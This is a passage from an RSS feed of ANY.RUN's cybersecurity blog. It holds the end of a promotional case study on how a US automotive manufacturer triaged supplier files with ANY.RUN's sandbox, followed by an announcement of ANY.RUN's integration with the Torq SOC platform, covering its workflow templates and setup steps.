<figure class="wp-block-pullquote"><blockquote><p><em>“We cut the time it takes to move from a suspicious supplier file to a clear decision in half. That gave the business faster answers and reduced the time potential&nbsp;threats remained unresolved.”</em>&nbsp;</p><cite><strong><em>Head of SOC, US automotive manufacturer</em></strong>&nbsp;</cite></blockquote></figure>



<p class="wp-block-paragraph">This faster process also reduced the company’s exposure window. Analysts reached evidence-backed verdicts sooner without sacrificing investigation depth, helping the SOC protect operations while keeping supplier workflows moving.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-336"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="5"
           data-wpID="336"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Before ANY.RUN                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Result with ANY.RUN                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Business Impact                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        No systematic process for analyzing vendor files                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Hundreds of supplier files analyzed weekly                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Greater triage capacity without additional hiring                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        No behavioral analysis layer in supplier file intake                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Malicious behaviordetected through direct execution evidence                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Higher detection rate and lower third-party exposure                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Most suspicious submissions escalated by Tier 1                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Significant reduction in Tier 1 escalations                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        More senior analyst capacity for critical incidents                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Slow, context-limited investigations                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        2x faster alert processing and threat analysis                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Improved MTTD and MTTR with a shorter exposure window                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-336'>
table#wpdtSimpleTable-336{ table-layout: fixed !important; }
table#wpdtSimpleTable-336 td, table.wpdtSimpleTable336 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">A Practical Model for Manufacturing Leaders Managing Third-Party Risk&nbsp;</h2>



<p class="wp-block-paragraph">For manufacturing leaders, supplier security is not only a SOC issue. It affects operational&nbsp;continuity, staffing costs, executive accountability, and the company’s ability to grow without increasing exposure.&nbsp;</p>



<p class="wp-block-paragraph">A scalable approach should combine&nbsp;consistent file validation, broader&nbsp;threat&nbsp;context, and measurable outcomes.&nbsp;</p>



<h3 class="wp-block-heading">Turn Supplier File Intake into a Defined Risk&nbsp;Control&nbsp;</h3>



<p class="wp-block-paragraph">A&nbsp;consistent&nbsp;triage&nbsp;helps the SOC apply the same standard to files received from vendors and&nbsp;contractors.&nbsp;</p>



<p class="wp-block-paragraph">With behavioral evidence from the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> and additional context from <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>, teams can replace inconsistent manual checks with a repeatable validation workflow.</p>



<p class="wp-block-paragraph">For leadership, this creates clearer oversight of one of the company’s most exposed third-party risk channels.&nbsp;</p>



<h3 class="wp-block-heading">Increase Capacity Without Matching Growth with Headcount&nbsp;</h3>



<p class="wp-block-paragraph">Faster verdicts and fewer unnecessary escalations allow the existing team to handle more supplier submissions.&nbsp;</p>



<p class="wp-block-paragraph">ANY.RUN reduces duplicated work, protects senior analyst capacity, and helps the SOC process higher file volumes without expanding at the same rate.&nbsp;</p>



<p class="wp-block-paragraph">The result is lower investigation cost and greater value from existing security resources.&nbsp;</p>



<h3 class="wp-block-heading">Protect Operations Without Slowing Supplier Activity&nbsp;</h3>



<p class="wp-block-paragraph">Suspicious files can be&nbsp;analyzed&nbsp;in a&nbsp;controlled environment before they reach internal systems, while legitimate submissions move&nbsp;through review faster.&nbsp;</p>



<p class="wp-block-paragraph">This helps reduce the risk of supplier-borne&nbsp;threats without creating unnecessary delays for manufacturing, procurement, engineering, or other teams that depend on third-party collaboration.&nbsp;</p>



<h3 class="wp-block-heading">Connect Individual Submissions to Wider Exposure&nbsp;</h3>



<p class="wp-block-paragraph">A suspicious file may be only one part of a larger campaign.&nbsp;</p>



<p class="wp-block-paragraph">ANY.RUN’s&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence</a>&nbsp;solutions help teams&nbsp;connect indicators to known infrastructure, related samples, active campaigns, and broader attacker activity.&nbsp;</p>



<p class="wp-block-paragraph">This gives leadership a clearer view of whether the company is dealing with an isolated submission or wider exposure involving suppliers and other external partners.&nbsp;</p>



<h3 class="wp-block-heading">Demonstrate Measurable Business Value&nbsp;</h3>



<p class="wp-block-paragraph">The strongest supplier security programs are measured by outcomes, not by the number of files processed.&nbsp;</p>



<p class="wp-block-paragraph">With ANY.RUN, organizations can track improvements such as lower MTTD and MTTR, higher detection rates, fewer Tier 1 escalations, greater analysis capacity, and shorter exposure windows.&nbsp;</p>



<p class="wp-block-paragraph">These results make it easier to show how supplier security investments reduce risk, avoid&nbsp;additional&nbsp;staffing costs, and support business growth.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">Reach a<span class="highlight"> 20-second MTTD</span> and shorten the exposure window.
<br><span class="highlight">Reduce supplier-driven risk </span> before it affects operations.  
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/by-industry/manufacturing/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktomanufacturing#contact-sales" target="_blank" rel="noopener">
Strengthen supplier security  &nbsp;
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



<p class="wp-block-paragraph">For this US automotive manufacturer, supplier file intake had become both a security risk and a growing cost center. More than 200 vendors were sending files into the environment, while analysts lacked a consistent way to validate behavior, add threat context, and reach fast decisions.</p>



<p class="wp-block-paragraph">With ANY.RUN, the company built a scalable triage process that now supports hundreds of supplier files every week without&nbsp;additional&nbsp;headcount.&nbsp;Threat&nbsp;analysis became 2x faster, MTTD and MTTR improved, detection increased, and fewer cases required Tier 2 escalation.&nbsp;</p>



<p class="wp-block-paragraph">The result is a stronger security model for a complex supplier ecosystem: lower third-party exposure, better use of analyst time, and faster decisions that keep business operations moving.&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p class="wp-block-paragraph">ANY.RUN, a leading provider of interactive malware analysis and&nbsp;threat&nbsp;intelligence solutions, helps SOC teams, MSSPs, and enterprises investigate cyber&nbsp;threats faster and make evidence-based security decisions.&nbsp;</p>



<p class="wp-block-paragraph">Its cloud-based <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> enables teams to safely analyze suspicious files, URLs, and emails in real time, observe malicious behavior as it unfolds, and collect clear evidence for triage and response.</p>



<p class="wp-block-paragraph">ANY.RUN’s&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence</a>&nbsp;solutions provide&nbsp;additional&nbsp;context&nbsp;around indicators, malicious infrastructure, emerging campaigns, and attacker activity. Together, these capabilities help organizations improve&nbsp;threat&nbsp;detection, reduce investigation time, and manage growing security demands without adding unnecessary operational costs.&nbsp;</p>
<p>The post <a href="https://any.run/cybersecurity-blog/us-manufacturer-security-risk/">Closing the Supplier Security Gap: How a US Manufacturer Cut Third-Party Risk and Doubled SOC Triage Speed</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/us-manufacturer-security-risk/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ANY.RUN &amp; Torq Integration: Scale Triage &amp; Respond with Confidence</title>
		<link>https://any.run/cybersecurity-blog/torq-integration/</link>
					<comments>https://any.run/cybersecurity-blog/torq-integration/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 25 Jun 2026 11:56:11 +0000</pubDate>
				<category><![CDATA[Integrations & connectors]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[release]]></category>
		<category><![CDATA[update]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=21801</guid>

					<description><![CDATA[<p>Lack of alert context makes it difficult for Security Operations Centers (SOC) to distinguish actual threats from false positives. ANY.RUN’s integration with the Torq AI SOC Platform bridges this gap by delivering conclusive malware &#38; phishing verdicts and actionable intelligence.   The result for your team is faster incident resolution, reduced alert fatigue, and proactive threat detection.&#160; ANY.RUN &#38; Torq [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/torq-integration/">ANY.RUN &amp; Torq Integration: Scale Triage &amp; Respond with Confidence</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><strong>Lack of alert context</strong> makes it difficult for Security Operations Centers (SOC) to distinguish actual threats from false positives. <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a>’s integration with the <a href="https://torq.io/ai-soc-platform/" target="_blank" rel="noreferrer noopener"><strong>Torq AI SOC Platform</strong></a> bridges this gap by delivering conclusive malware &amp; phishing verdicts and actionable intelligence.  </p>



<p class="wp-block-paragraph"><strong>The result for your team is faster incident resolution</strong>, reduced alert fatigue, and proactive threat detection.&nbsp;</p>



<h2 class="wp-block-heading">ANY.RUN &amp; Torq Integration&nbsp;</h2>



<p class="wp-block-paragraph">Unlike legacy SOAR approaches that often require custom code and months of implementation, <strong>Torq</strong> allows <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">SOC</a> and <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSP teams</a> to build response logic visually. The ANY.RUN integration adds a critical layer of malware analysis, phishing detection, and IOC enrichment to these workflows. </p>



<p class="wp-block-paragraph"><strong>ANY.RUN</strong> users have access to <strong>five ready-to-use </strong><a href="https://torq.io/hyperagents/" target="_blank" rel="noreferrer noopener"><strong>Torq HyperAgents<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /></strong></a> designed to accelerate time-to-verdict:</p>



<ul class="wp-block-list">
<li><a href="https://kb.torq.io/en/articles/15027756-workflow-template-enrich-case-with-threat-intelligence-data-any-run-ti-lookup" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Enrichment with TI Lookup</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://kb.torq.io/en/?q=any.run" target="_blank" rel="noreferrer noopener"><strong>File &amp; URL Analysis with Interactive&nbsp;Sandbox</strong></a>&nbsp;</li>
</ul>



<p class="wp-block-paragraph">Results, including reputation data, threat names, tags, and structured JSON responses, are delivered directly into <a href="https://torq.io/case-management/" target="_blank" rel="noreferrer noopener"><strong>Torq Case Management.</strong></a> Teams can edit the current templates to fit their specific processes, adding actions, changing conditions, or using ANY.RUN as one specific step in a complex, multi-tool automation. </p>



<p class="wp-block-paragraph">Available on&nbsp;<a href="https://any.run/plans-ti/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktotipricing" target="_blank" rel="noreferrer noopener">ANY.RUN Threat&nbsp;Intelligence</a>&nbsp;and&nbsp;<a href="https://any.run/plans/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktosbpricing" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox&nbsp;plans</a>&nbsp;<strong>with API access</strong>, the integration helps analysts streamline their workflows, gaining full alert or threat context quickly with an average reduction in MTTR of 21 minutes.&nbsp;&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Speed up triage &#038; response inside Torq with ANY.RUN<br>Scale your SOC capability <span class="highlight">without adding headcount</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=torq-integration&#038;utm_term=250626&#038;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noopener">
Contact us&nbsp;
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Interactive&nbsp;Sandbox&nbsp;Templates in Torq&nbsp;</h2>



<p class="wp-block-paragraph">The&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktosblanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>&nbsp;workflows allow analysts to detonate suspicious objects in real-time environments (<a href="https://any.run/cybersecurity-blog/windows-11-malware-sandbox/" target="_blank" rel="noreferrer noopener">Windows</a>,&nbsp;<a href="https://any.run/cybersecurity-blog/linux-malware-analysis-sandbox/" target="_blank" rel="noreferrer noopener">Linux</a>,&nbsp;<a href="https://any.run/cybersecurity-blog/anyrun-macos-sandbox/" target="_blank" rel="noreferrer noopener">macOS</a>&nbsp;or&nbsp;<a href="https://any.run/cybersecurity-blog/android-malware-analysis/" target="_blank" rel="noreferrer noopener">Android</a>) to uncover evasive behaviors. There are&nbsp;<strong>two types of templates</strong>&nbsp;available for&nbsp;sandbox&nbsp;analysis:&nbsp;</p>



<h3 class="wp-block-heading">1. Case-Based Workflows&nbsp;</h3>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="427" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image7-2-1024x427.png" alt="" class="wp-image-21810" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image7-2-1024x427.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image7-2-300x125.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image7-2-768x320.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image7-2-370x154.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image7-2-270x112.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image7-2-740x308.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image7-2.png 1318w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">ANY.RUN&#8217;s Sandbox provides fast case enrichment in Torq </figcaption></figure>
</div>


<p class="wp-block-paragraph">These are triggered directly from a&nbsp;<strong>Torq Case</strong>, where observables and attachments are automatically ingested from sources like EDR, SIEM, XDR, or email security tools.&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Process:</strong>&nbsp;The analyst opens a case and launches the workflow. The system automatically retrieves observables or attachments, filtering for supported objects such as&nbsp;<strong>URLs or files</strong>. Analysts can then select specific objects for detonation.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Result:</strong>&nbsp;Analysis data is added to the case notes in real-time. This includes a brief context, reputation,&nbsp;threat&nbsp;names or tags, and a structured JSON response. Additionally, a direct link is provided, allowing the analyst to jump into the ANY.RUN session to continue a manual, interactive analysis.&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The list of case-based templates:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://kb.torq.io/en/articles/15027776-workflow-template-enrich-case-with-url-analysis-in-any-run-sandbox" target="_blank" rel="noreferrer noopener">Enrich Case with URL Analysis in ANY.RUN&nbsp;Sandbox</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://kb.torq.io/en/articles/15027772-workflow-template-enrich-case-with-file-analysis-in-any-run-sandbox" target="_blank" rel="noreferrer noopener">Enrich Case with File Analysis in ANY.RUN&nbsp;Sandbox</a>&nbsp;</li>
</ul>



<h3 class="wp-block-heading">2.&nbsp;Sandbox&nbsp;Analysis Workflows&nbsp;</h3>



<p class="wp-block-paragraph">These templates are designed to be embedded as a specific step within a larger, custom&nbsp;<strong>incident response flow</strong>.&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Process:</strong>&nbsp;Unlike case-based templates, these function independently of a specific case. They accept a&nbsp;<strong>URL or File</strong>&nbsp;as an input parameter and&nbsp;initiate&nbsp;the ANY.RUN&nbsp;Sandbox&nbsp;analysis.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Result:</strong>&nbsp;The workflow waits for the analysis to complete and returns a structured JSON object&nbsp;containing&nbsp;the final verdict,&nbsp;analysis&nbsp;metadata, a list of IOCs, and a link to the full report. This data can then be passed further down the custom automation chain.&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The list of&nbsp;sandbox&nbsp;analysis templates:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://kb.torq.io/en/articles/15027767-workflow-template-analyze-urls-with-any-run-sandbox" target="_blank" rel="noreferrer noopener">Analyze URLs with ANY.RUN&nbsp;Sandbox</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://kb.torq.io/en/articles/15027760-workflow-template-analyze-files-with-any-run-sandbox" target="_blank" rel="noreferrer noopener">Analyze Files with ANY.RUN&nbsp;Sandbox</a>&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Threat Intelligence Lookup Templates in Torq&nbsp;</h2>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="636" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image11-1-1024x636.png" alt="" class="wp-image-21812" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image11-1-1024x636.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image11-1-300x186.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image11-1-768x477.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image11-1-1536x953.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image11-1-370x230.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image11-1-270x168.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image11-1-740x459.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image11-1.png 1661w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">TI Lookup adds context to isolated indicators, giving SOC teams the clarity for correct decisions</figcaption></figure>
</div>


<p class="wp-block-paragraph">The&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktolookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence (TI) Lookup</strong></a>&nbsp;integration focuses on rapid enrichment of &#8220;raw&#8221; observables found in alerts, such as IPs, domains, hashes, and URLs.&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Automation at Scale:</strong>&nbsp;When a case&nbsp;contains&nbsp;suspicious indicators, the TI Lookup workflow queries ANY.RUN’s vast database of threat data—continuously updated from millions of&nbsp;sandbox&nbsp;sessions.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Instant Context:</strong>&nbsp;The workflow returns high-fidelity data including the&nbsp;<strong>reputation</strong>&nbsp;of the indicator,&nbsp;<strong>threat names</strong>, and specific&nbsp;<strong>tags</strong>. This allows analysts to&nbsp;immediately&nbsp;understand the nature of a threat and decide whether to block the indicator or escalate the incident.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Enrichment Integration:</strong>&nbsp;Much like the&nbsp;sandbox&nbsp;workflows, TI Lookup results are delivered directly into the Torq interface as JSON data or case notes, ensuring that the analyst never has to leave their primary workspace to gather intelligence.&nbsp;</li>
</ul>



<p class="wp-block-paragraph">Explore&nbsp;<a href="https://kb.torq.io/en/articles/15027756-workflow-template-enrich-case-with-threat-intelligence-data-any-run-ti-lookup" target="_blank" rel="noreferrer noopener">the TI Lookup template</a>.&nbsp;</p>



<h2 class="wp-block-heading">How to Integrate ANY.RUN in Torq&nbsp;</h2>



<p class="wp-block-paragraph">Setting up the integration is straightforward and requires no custom coding:&nbsp;</p>



<ol start="1" class="wp-block-list">
<li>Navigate to&nbsp;<strong>Integrations</strong>&nbsp;within Torq and&nbsp;locate&nbsp;<strong>ANY.RUN</strong>.&nbsp;</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Click&nbsp;<strong>Add</strong>, create a new instance, and enter your&nbsp;<strong>API key</strong>.&nbsp;</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Go to the&nbsp;<strong>Templates</strong>&nbsp;tab and search for ANY.RUN templates.&nbsp;</li>
</ol>



<ol start="4" class="wp-block-list">
<li>Select your previously configured ANY.RUN integration to begin using the workflows.&nbsp;</li>
</ol>



<p class="wp-block-paragraph">By default, these playbooks are configured to be&nbsp;<strong>launched manually</strong>. This is a deliberate design choice to ensure that only&nbsp;appropriate objects&nbsp;are sent for analysis.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">However, for high-volume environments, these templates can be easily integrated into broader,&nbsp;<strong>fully automated playbooks</strong>.&nbsp;</p>



<h2 class="wp-block-heading">Key SOC &amp; MSSP Benefits of Integrating ANY.RUN in Torq&nbsp;</h2>



<p class="wp-block-paragraph">ANY.RUN’s deep behavioral visibility with Torq’s hyper-automated orchestration levels up the efficiency of modern security operations, moving beyond simple automation toward maximizing security ROI.&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Faster incident resolution (MTTR)</strong>: Automating&nbsp;sandbox&nbsp;analysis and threat intelligence correlation allows you to&nbsp;<strong>cut incident resolution time by tens of percent</strong>.&nbsp;Analysts get clear verdicts in seconds, enabling them to block threats before they spread.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Operational Scaling:</strong> Teams can handle a growing volume of alerts with <strong>Torq HyperAgents<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> &amp; handling</strong><strong> routine Tier 1 tasks</strong>, allowing analysts to focus on complex threats without increasing headcount.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Zero development overhead</strong>: Unlike custom integrations that require months of engineering, this no-code setup is ready in minutes. You get a functional automation foundation without the cost of writing or&nbsp;maintaining&nbsp;scripts.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Standardized investigation logic</strong>: Every alert is checked using the same high-fidelity criteria. This ensures consistent results and reduces the risk of human error, regardless of an analyst&#8217;s experience level.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Higher ROI on existing tools</strong>: ANY.RUN works as an enrichment layer inside Torq, making your SIEM, EDR, and other security investments more effective by providing them with immediate, actionable context.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Reduced analyst burnout</strong>: By&nbsp;eliminating&nbsp;manual data entry and constant switching between tools, you allow your team to focus on meaningful security work, which improves overall SOC productivity.&nbsp;</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Integrate ANY.RUN&#8217;s solutions in Torq<br><span class="highlight">Close security gaps</span> and reduce MTTR with confidence
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=torq-integration&amp;utm_term=250626&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noopener">
Contact us&nbsp;
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



